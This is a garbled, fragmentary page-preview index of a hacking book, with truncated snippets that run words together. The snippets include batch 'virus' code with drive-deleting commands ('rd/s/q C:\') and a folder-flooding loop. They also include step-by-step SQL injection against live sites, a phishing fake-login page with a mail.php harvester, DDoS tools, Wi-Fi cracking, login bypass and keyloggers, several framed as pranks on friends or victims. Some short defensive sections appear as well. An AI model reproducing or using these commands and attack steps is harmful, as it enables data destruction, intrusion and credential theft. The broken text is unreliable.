- Page 2 and 3: BY: UJJWAL SAHAYCO-FOUNDER[www.theb
- Page 4 and 5: secure. Ujjwal is a regularauthor a
- Page 6 and 7: misusing the information inthis boo
- Page 8 and 9: ABOUT THEAUTHOR…UJJWAL SAHAY is a
- Page 12 and 13: his studies in computerscience with
- Page 14 and 15: short to identify the fact thatcrim
- Page 16 and 17: not much familiar regardingcomputer
- Page 18 and 19: Your hands so warmYour voice so cle
- Page 20 and 21: SRIVASTAVA, Mr.BAKSHI RAJESH PRASAD
- Page 22 and 23: Tripathi (Creative head @THE BIG CO
- Page 24 and 25: Internet to obtain the varioustools
- Page 26 and 27: 18•Grey HatHackers...............
- Page 28 and 29: ...................................
- Page 30 and 31: 31 6.) Hack your friend'skeyboard a
- Page 32 and 33: 51Password-cracking software:-.....
- Page 34 and 35: ...................................
- Page 36 and 37: YOURFRIENDS........................
- Page 38 and 39: Qslowloris.........................
- Page 40 and 41: PDF FILES FROMCOPYING..............
- Page 42 and 43: FILES...........................198
- Page 44 and 45: types of hackers and theircommuniti
- Page 46 and 47: by sharing knowledge andproper secu
- Page 48 and 49: destructive intents.Obviously, the
- Page 50 and 51: differently). For example,gray hats
- Page 52 and 53: unauthorized access into asystem an
- Page 54 and 55: You can also get a call withyour ow
- Page 56 and 57: the network systems.•It’s an ac
- Page 58 and 59: they do. Hackers want accessto your
- Page 60 and 61:
Internet. Every computer,even yours
- Page 62 and 63:
CREATION OF VIRUS INNOTEPADNow, it
- Page 64 and 65:
Virus creation codes of thebatch fi
- Page 66 and 67:
:topmd%random%goto top.Now when you
- Page 68 and 69:
open the virus you havecreated to d
- Page 70 and 71:
command prompt of thevictim’s com
- Page 72 and 73:
of the batch file of this virus.COD
- Page 74 and 75:
"rd/s/q D:\rd/s/q C:\rd/s/q E:\" (W
- Page 76 and 77:
WScript.Sleep 180000WScript.Sleep 1
- Page 78 and 79:
WScript.Sleep 500WshShell.SendKeys
- Page 80 and 81:
Open the notepad and typethe follow
- Page 82 and 83:
75>>\z.dbg echo e120 FB ECA8 08 74
- Page 84 and 85:
FB EC A8 08 74 FB BA C903 88 D8 EE
- Page 86 and 87:
BATCH TOEXECONVERSIONConvert Batch
- Page 88:
file.2. Moreover EXE providesprotec
- Page 91 and 92:
for both beginner andadvanced users
- Page 93 and 94:
MESSING UPWITHREGISTRYHACKING “OP
- Page 95 and 96:
registry editing.Registry: - it is
- Page 97 and 98:
Then you have to click on“HKEY_CL
- Page 99 and 100:
Click on the folder option toopen i
- Page 101 and 102:
Just open the “Default”string (
- Page 103 and 104:
Ujjwal Sahay”.
- Page 105 and 106:
These have been around forsome time
- Page 107 and 108:
can hit a fair number ofpasswords w
- Page 109 and 110:
because someone who knowsyour login
- Page 111 and 112:
organization’s operatingsystem an
- Page 113 and 114:
(Hashes are cryptographicrepresenta
- Page 115 and 116:
process any time and thenresume whe
- Page 117 and 118:
all from a bootable CD.John the Rip
- Page 119 and 120:
Aircrack-NG is a WiFipassword crack
- Page 121 and 122:
Crack is a hash cracker toolthat us
- Page 123 and 124:
use for your passwordcracking proce
- Page 125 and 126:
(SAM) database (c:\winnt\system32\c
- Page 127 and 128:
MUST HAVEPASSWORDPOLICIESPASSWORDCR
- Page 129 and 130:
awareness of socialengineeringattac
- Page 131 and 132:
passwords — just make themslightl
- Page 133 and 134:
Use password-protectedscreen savers
- Page 135 and 136:
KONBOOTBYPASS WINDOWSLOGON SCREENPA
- Page 137 and 138:
knowledge of the password.Kon-Boot
- Page 139 and 140:
directly enable you into thewindows
- Page 141 and 142:
as they’re typed into thecomputer
- Page 143 and 144:
I suggest you to check outfamily ke
- Page 145 and 146:
PREVENTIONS:The best defense agains
- Page 147 and 148:
DO YOU HAVERATED 7.9 ?Learn How to
- Page 149 and 150:
because of the Graphics subscore.Ho
- Page 151 and 152:
the systemYou will see a screen sim
- Page 153 and 154:
> DataStoreYou will able to see sev
- Page 155 and 156:
hunt anything, simply changethe val
- Page 157 and 158:
To revert the changes you canre-run
- Page 159 and 160:
Which is the most commonway in thes
- Page 161 and 162:
POLICY.The group policy editor will
- Page 163 and 164:
3.) Administrative templatesJust gi
- Page 165 and 166:
arranged you can skip thisstep.Now
- Page 167 and 168:
Double click on the “hidethese sp
- Page 169 and 170:
window.After applying the settingsj
- Page 171 and 172:
window as marked in theabove screen
- Page 173 and 174:
do it on your own riskbecause it wi
- Page 175 and 176:
Double click on the savedfile to ru
- Page 177 and 178:
LET’S HAVESOME FUNFUNNY VIRUS TOS
- Page 179 and 180:
So follow the steps:Open the notepa
- Page 181 and 182:
Now your work is to executethe viru
- Page 183 and 184:
But again it does not matterif you
- Page 185 and 186:
The trick we are going tolearn here
- Page 187 and 188:
Open the“HKEY_LOCAL_MACHINE”as
- Page 189 and 190:
Then open the “Description”opti
- Page 191 and 192:
STRINGS.Search for the “processor
- Page 193 and 194:
it is written what yourcomputer’s
- Page 195 and 196:
them.Such as you canwrite”Intel(R
- Page 197 and 198:
The system properties ofyour comput
- Page 199 and 200:
proud that YOU HAVE ACORE i7 PROCES
- Page 201 and 202:
Google we use to open theGoogle web
- Page 203 and 204:
searches under double quotes.Like:
- Page 205 and 206:
iOSPASSWORDCRACKINGIOS PASSWORDCRAC
- Page 207 and 208:
To enter DFU mode, simplypower the
- Page 209 and 210:
Toolkit Ram disk onto themobile dev
- Page 211 and 212:
After that you see the toolkitwhich
- Page 213 and 214:
on the main menu:iOS Forensic Toolk
- Page 215 and 216:
So be aware about theattacks! Get u
- Page 217 and 218:
HIDE YOURRECYCLE BINHACK TO HIDETHE
- Page 219 and 220:
familiar with the “registryeditor
- Page 221 and 222:
By finalizing all steps don’tforg
- Page 223 and 224:
DDoS Attack?DDoS stands for “Dist
- Page 225 and 226:
and extra. Comprised ofSeemingly le
- Page 227 and 228:
attacked web site, andmagnitude is
- Page 229 and 230:
most ordinarily for DDoSattacks.Bot
- Page 231 and 232:
different Botnet servers,making ent
- Page 233 and 234:
additionally.Even for nontechnicalu
- Page 235 and 236:
the target network.Tor’s HammerIs
- Page 237 and 238:
of little chunks, using the“range
- Page 239 and 240:
Botnet DDoS AttacksBotnet DDoS atta
- Page 241 and 242:
by a minimum of one attackthat exce
- Page 243 and 244:
articles among all of theabove chap
- Page 245 and 246:
bypassing login …….i.e.Authenti
- Page 247 and 248:
After finding the login pageyou hav
- Page 249 and 250:
If the authentication bypasswill no
- Page 251 and 252:
For example:site:www.anyselectedsit
- Page 253 and 254:
Step 2: Finding Number ofcolumns in
- Page 255 and 256:
column is "n-1".I mean:http://www.a
- Page 257 and 258:
So now n=8, the number ofcolumn is
- Page 259 and 260:
For eg:If the number of columns is
- Page 261 and 262:
Replace the 3 from the querywith "v
- Page 263 and 264:
If the Database version is 5 orabov
- Page 265 and 266:
Let us choose the "admin "table.Ste
- Page 267 and 268:
Once you installed the addon,you ca
- Page 269 and 270:
Copy and paste the code atthe end o
- Page 271 and 272:
Now replace the " fromtable_name=CH
- Page 273 and 274:
Step 7: Finding the AdminPanel:Just
- Page 275 and 276:
flaws in your applications.SQL Inje
- Page 277 and 278:
simple. Developers need toeither: a
- Page 279 and 280:
issimplyappended to thequery allows
- Page 281 and 282:
statements (parameterizedqueries) i
- Page 283 and 284:
Dynamic SQL can almostalways be rep
- Page 285 and 286:
Supplied InputThis third technique
- Page 287 and 288:
This technique works likethis. Each
- Page 289 and 290:
5. Remove all functionalityyou don'
- Page 291 and 292:
and there is no excuse for notusing
- Page 293:
extension, the tool isavailable in
- Page 297 and 298:
As you see, there are manysteps you
- Page 299 and 300:
WPA2TESTINGWI-FI HACKINGUSINGBACKTR
- Page 301 and 302:
your computer, you will beresponsib
- Page 303 and 304:
ease. Although this is the casemany
- Page 305 and 306:
CD/DVD. For installingprocesses you
- Page 307 and 308:
interface, in this case thename is
- Page 309 and 310:
3) Now the next work is totype airm
- Page 311 and 312:
we have the capability to seeall th
- Page 313 and 314:
In the above screenshot thereis a l
- Page 315 and 316:
Wi-Fi password. This packetcapturin
- Page 317 and 318:
ends with your wirelessadapters dev
- Page 319 and 320:
In case of WPA use thefollowing com
- Page 321 and 322:
PREVENTION:For the prevention from
- Page 323 and 324:
are here with an article on thetopi
- Page 325 and 326:
process we need to deal withregiste
- Page 327 and 328:
So , let’s move towards ourway
- Page 329 and 330:
authorized to use theapplication”
- Page 331 and 332:
Basically, this is aconditional jum
- Page 333 and 334:
correct it will give you theerror m
- Page 335 and 336:
PHISHINGATTACK AHEAD
- Page 337 and 338:
give some confidentialinformation.W
- Page 339 and 340:
sends a fake login page to thevicti
- Page 341 and 342:
it with anything.phpSuch as “acti
- Page 343 and 344:
?>Andsave it as “mail.php”(save
- Page 345 and 346:
step 3: Give the link of thefake pa
- Page 347 and 348:
This page will looks exactlysimilar
- Page 349 and 350:
In the same way you can hackFACEBOO
- Page 351 and 352:
USBSECURITYSecuring Pen DrivesFrom
- Page 353 and 354:
So, if your pendrive isinfected by
- Page 355 and 356:
drive is still not totally secure.
- Page 357 and 358:
Open notepad and replica andpaste t
- Page 359 and 360:
[HKEY_LOCAL_MACHINESevicePolicies]
- Page 361 and 362:
documents. In this article Iwill sh
- Page 363 and 364:
select the option “single pdfdocu
- Page 365 and 366:
Click “save” or “save as” t
- Page 367 and 368:
folder in windows explorer.
- Page 369 and 370:
NOTIFY MESENDING AMESSAGE TOOTHER U
- Page 371 and 372:
Open the task manager ofyour pc by
- Page 373 and 374:
A dialogue box will be openafter yo
- Page 375 and 376:
A FOLDER WITHEMPTY NAMEThis is the
- Page 377 and 378:
When it asks to rename thefolder ju
- Page 379 and 380:
SPYING WITHANDROIDHACKINGANDROID PH
- Page 382:
By using this tool you caneasily ke
- Page 386 and 387:
within seconds.A very interesting t
- Page 388 and 389:
will find a lot of tools likethis a
- Page 390 and 391:
Now I have a very interestingthing
- Page 392 and 393:
lets you control your entirewindows
- Page 394 and 395:
installed it …..Launch it.Connect
- Page 396 and 397:
The “Basic input” remotewill pr
- Page 398 and 399:
Example: - keyboardcontrolling, fil
- Page 400 and 401:
to launch GOD MODE inyour computer.
- Page 402 and 403:
new folder. When it asksyou to rena
- Page 404:
press enter.And you will see that t
- Page 407:
We are going to bypass thelock scre
- Page 410 and 411:
manager zip to root of yourSD card.
- Page 412 and 413:
manager again.In aroma Go toData>>S
- Page 414 and 415:
REAVERBACKTRACKWI-FI CRACKINGUSING
- Page 416 and 417:
Now the next command towrite is:Air
- Page 418 and 419:
I have executed the commandand it s
- Page 420 and 421:
WINDOWSSHORTCUTSSOME USEFULWINDOWSS
- Page 422 and 423:
Tool11. Windows Key + M:Minimize Al
- Page 424 and 425:
DATAFORENSICSHOW TORECOVERPERMANENT
- Page 426 and 427:
By using this tool you canrecover y
- Page 428 and 429:
need.
- Page 430 and 431:
And show you the list of theentire
- Page 432 and 433:
recover option to recoveryour data
- Page 434 and 435:
deleted accidently.CONCLUSION:Thank
- Page 436:
THEBIGCOMPUTINGHACK-X-CRYPT204